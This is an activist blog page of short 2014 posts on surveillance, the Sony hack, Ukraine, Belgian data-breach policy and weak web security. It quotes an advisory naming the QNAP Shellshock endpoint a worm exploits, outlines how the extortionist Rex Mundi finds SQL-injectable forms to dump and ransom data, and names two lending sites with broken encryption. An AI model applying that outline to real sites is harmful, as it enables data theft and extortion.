No trust without independent control - Page 2

  • CIA terrorlist of psychological mindgames with music

    source http://theantimedia.org/playlist-used-by-the-cia-to-torture-detainees/

    I imagine listening to Sesame street for 18 hours every day makes you so mad you just want to get out of there

    Deicide: Fuck Your God

    Dope: Die MF Die, Take Your Best Shot

    Eminem: White America, Kim

    Barney & Friends: theme song

    Drowning Pool: Bodies

    Metallica: Enter Sandman

    Meow Mix: commercial jingle

    Janeane Garofalo/Ben Stiller: chapter from the Feel This Audiobook

    Sesame Street: theme song

    David Gray: Babylon

    AC/DC: Shoot to Thrill, Hell’s Bells

    Bee Gees: Stayin’ Alive

    Tupac: All Eyez On Me

    Christina Aguilera: Dirrty

    Neil Diamond: America

    Rage Against the Machine: unspecified songs

    Don McLean: American Pie

    Saliva: Click Click Boom

    Matchbox Twenty: Cold

    (hed)pe: Swan Dive

    Prince: Raspberry Beret

  • the demonstration in NY against police brutality (or the lack of punishment) in timelapse

    very interesting idea

    but they are not a million .....

    but in present days you don't need to be with millions to have an impact (you need to have the attention of the media - even for the wrong reasons)

     

  • germany doesn't has an answer yet to the latest growing extreme right movement

    source http://www.theguardian.com/world/2014/dec/15/dresden-police-pegida-germany-far-right

    it is easier if they are just plain nazi's and difficult if they have gone into deep undercover (of the simple people who are not nazi's but disturbed by ISIS and militant islamic priests and movements)

     

  • #shellshock if you haven't patched your qnap servers you will get hacked

    some cloudproviders have been hacked over the last days

    this is an alert, read more on the problem by following the link

    "Shellshock is far from "over", with many devices still not patched and out there ready for exploitation. One set of the devices receiving a lot of attention recently are QNAP disk storage systems. QNAP released a patch in early October, but applying the patch is not automatic and far from trivial for many users[1]. Our reader Erich submitted a link to an interesting Pastebin post with code commonly used in these scans [2]

     

    The attack targets a QNAP CGI script, "/cgi-bin/authLogin.cgi", a well known vector for Shellshock on QNAP devices [3]. This script is called during login, and reachable without authentication. The exploit is then used to launch a simple shell script that will download and execute a number of additional pieces of malware:
    https://isc.sans.edu/forums/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061

    and this comment shows why automatic patching is so important

    "I have one of the affected units. In the firmware update section of the admin interface, the closest thing I can find for an auto-updater is a checkbox that reads, "Automatically check if a new version is available when logging into the NAS web administration interface." From there, you have to manually tell the system to update -- as far as I can tell, there is no option to automatically update the unit. And the manufacturer doesn't send out emails to notify users when there is an update.
    http://arstechnica.com/security/2014/12/worm-exploits-nasty-shellshock-bug-to-commandeer-network-storage-systems/

  • #sonyhack sony tries to keep the leaks out of the standards press

    source http://www.bbc.com/news/entertainment-arts-30477257

    "Sony Pictures has contacted some US news outlets in an attempt to limit the damage caused by the hacking of its internal computer system last month.

     

    The studio, its letter informed them, "does not consent to your possession... dissemination, publication... or making any use of the stolen information".
    http://www.bbc.com/news/entertainment-arts-30477257

    this looks like Mensura here with me :)

    but than the press will only link to other media using the information or talking about unconfirmed rumors without even mentioning the leaks

  • #ukraine the diplomatic agreement over the North Pole is no more

    Danmark has told the UN panel who is responsable for dividing the North Pole that they don't agree with their attributed piece of the cake and that they want lots more from Russia (sending troops to the North Pole and setting up more military installations around it) and Canada

    http://www.bbc.com/news/world-europe-30481309

  • #sonyhack lost in fact its rootcertificate ; the certificate that makes other sony certificates

    among others

    it means they will have to redo their whole certificate infrastructure and default on all their old and present ones

    source http://arstechnica.com/security/2014/12/hackers-promise-christmas-present-sony-pictures-wont-like/

  • NIST publishes new guidelines for privacy and security audits

    NIST Computer Security Division announce the release of Special Publication (SP) 800-53 A Revision 4, Assessing Security and Privacy Controls in Federal Information Systems and Organizations: Building Effective Assessment Plans

     

    This update to Special Publication 800-53A contains significant changes to the 2010 version of the publication in both content and format.

     

    To view the full announcement of the release of SP 800-53 A Revision 4, please see the full announcement on the CSRC News/Announcement page – this announcement will provide full details of this updated document:
    http://csrc.nist.gov/news_events/#dec12

    Direct link to the SP 800-53A Revision 4 document (in .PDF):
    http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53Ar4.pdf

  • #ukraine the eastern members of NATO are going to help Ukraine themselves

    there is no sense waiting for a consensus that will never arrive because the interests are too different to arrive at any kind of meaningful compremise - also the Putin strategy of trying to keep  NATO from doing something meaningful in Ukraine is based upon the premise that they will always find compromise more important than letting each member decide for itself what it is going to do to help or not help Ukraine

    Now it will be much more difficult for Putin to stop NATO from helping and supporting Ukraine because the vetopower of power to slow down or stop any meaningful decision of individual states is gone

    The eastern european states will start helping each other and Ukraine in the first place meaning that we will have after some time a fortified intertwined eastern border not only linked to NATO but also to each other

    and as the real power is based in Putins mind of military power this is may stabilize or even change the battlefield in Ukraine and make it less likely that individual eastern states are impressed by his succession of military provocations and exercises at their borders

    meanwhile Russia keeps sending new military hardware to the border with Ukraine and afterwards into Ukraine bit by bit, day after day (of which some columns are going to Mariupol)

  • we are going on strike - see you on tuesday

    what did you expect

    I am an activist

    and my fight for privacy and security is independent from my political views - always have been - because it is the only way to make coalitions that can change things

    but for now

    I am on strike

  • volgens de privacycommissie zijn de slachtoffers verantwoordelijk voor alle kosten van hun dataverlies

    dit staat er momenteel in wat er in de kennisgeving moet staan aan de getroffenen

     

    • naam van de verantwoordelijke voor de gegevensverwerking,

    • contactgegevens van een aanspreekpunt waar bijkomende informatie kan worden verkregen,
    • samenvatting van het incident dat de persoonsgegevens heeft aangetast,
    • vermoedelijke datum van het incident,
    • aard en strekking van de betrokken persoonsgegevens,
    • denkbare gevolgen van het gegevenslek voor de betrokken personen,
    • omstandigheden waaronder het gegevenslek plaatsvond,
    • de maatregelen die de verantwoordelijke heeft genomen om dit gegevenslek te verhelpen,
    • de maatregelen die de verantwoordelijke aan de betrokken personen aanbeveelt om de mogelijke schade in te perken.
    http://www.privacycommission.be/nl/melding-gegevenslekken-algemeen

    dus de kosten en het ongemak van het wijzigen van de bankrekening of de gsm zijn enkel en alleen voor het slachtoffer, men noemt dit in feite dubbele victimisatie zoals bij verkrachting

    want als er dan nadien toch misbruik gebeurt van de gegevens dan is het opeens de fout van het slachtoffer die niet alles heeft gedaan wat hij had moeten doen volgens de oorzaak van het lek (de onveilige dataverzamelaar)

    nee, het is volgens mij de oorzaak van het datalek, de onveilige dataverzamelaar die de banken moet informeren als daar bankrekeningnummers in staan, de mobiele telefoonmaatschappijen als daar mobiele nummers in staan enzovoort

    dit is zo in de VS en misschien moeten we dat voorbeeld maar eens overnemen

    dan zullen opeens veel meer bedrijven meer gaan opletten en veel minder gegevens vragen die ze via een veiliger weg ook kunnen verkrijgen

  • microsoft is fucking up it once so fantastic automatic update service

    do they understand how important this is for the security of the machines

    if people start not downloading automatically security updates than we are creating a situation in which we are going back to 2004

    we should be able to trust Microsoft to have put every needed resource in this process so that we can continue to trust it

    and interfering with updates and drivers from hardware that are generally so well known shows that there is something going totally wrong in the quality control

    source http://www.forbes.com/sites/jasonevangelho/2014/12/13/new-windows-7-patch-is-effectively-malware-disables-graphics-driver-updates-and-windows-defender/

  • #rexmundi why does he works in Belgium ?

    it is quite simple

    it is simple

    the minister for privacy doesn't want the privacycommission to have more powers and more resources and the privacycommission itself told me last week that they were not responsable for the security of the internet and that they don't have the resources - maybe once the European directive on the dataprotection will come into force

    so who is responsable for the security of the internet

    the prime minister, well the new federal center for cybersecurity has been announced for years but after a lot of talk about who should be the general and the colonels they finally may be deciding to set it up but they don't seem to make this a priority and announce it for somewhere in 2015 while not being sure they have any funding for it

    the cert, the cert is not responsable for the security of the internet, they try to handle the incidents that they receive, not the incidents they want to prevent from happening '(which is why you can't call them the firemen of the internet over here because they don't have those powers or resources)

    the national bank and the financial sector have some rules and controls (although at the national bank the cell that is responsable for the itsecuritycontrols of the banks - although this is becoming internationally a big responsability - are with few and have very few powers and resources and best of all - the online companies for credit and loans are explicitly excluded from these controls without naming who is responsable

    maybe the sector could do it ? yep, the sector could do it but there are some initiatives but you see that they don't work and if the same kind of controls were put into place in our fields of our economy or real life than it would be a quite bloody mess around here

    so this is worse than the titanic

    there is even a captain on board and the crew is underpaid, understaffed and doesn't really know what it is supposed to do

    so if you were rexmundi why should you make your life difficult ?

    you do some google searches and find the forms, you do some quick checks and you see if the form has an sql injection or not and once you see that there is one, you download and send an email and a number of cases you get paid and in another you get publicity

    should we keep quiet about Rex Mundi

    well no because if we give publicity or not, the data are there online and the data are data from our citizens who don't know that their data are leaked or are informed but that is it - they don't do anything more (not paying for another mobile number, the cost of changing your emailaddress and all your passwords, bankaccounts and so on)

    the people have the right to know that this is a mess and nobody is telling them and the people who should clean it up are with too few and have too few resources and too few rights to intervene to prevent accidents from happening

    it is all too well from ministers and parliamentarians of saying how bad it is

    DO SOMETHING ABOUT IT NOW

  • rs-krediet.be asks all your personal details but no encryption when you fill data in

    in fact this means there is no real certificate

    there is some encryption on the server itself but it is not clear if there is encryption when you transfer information

    part of their forms

  • ls-krediet.be wants all your personal data but doesn't protect it with real encryption

    another certificate that doesn't work

    and that certificate is expired and weak

    but they need from you all these personal data online without login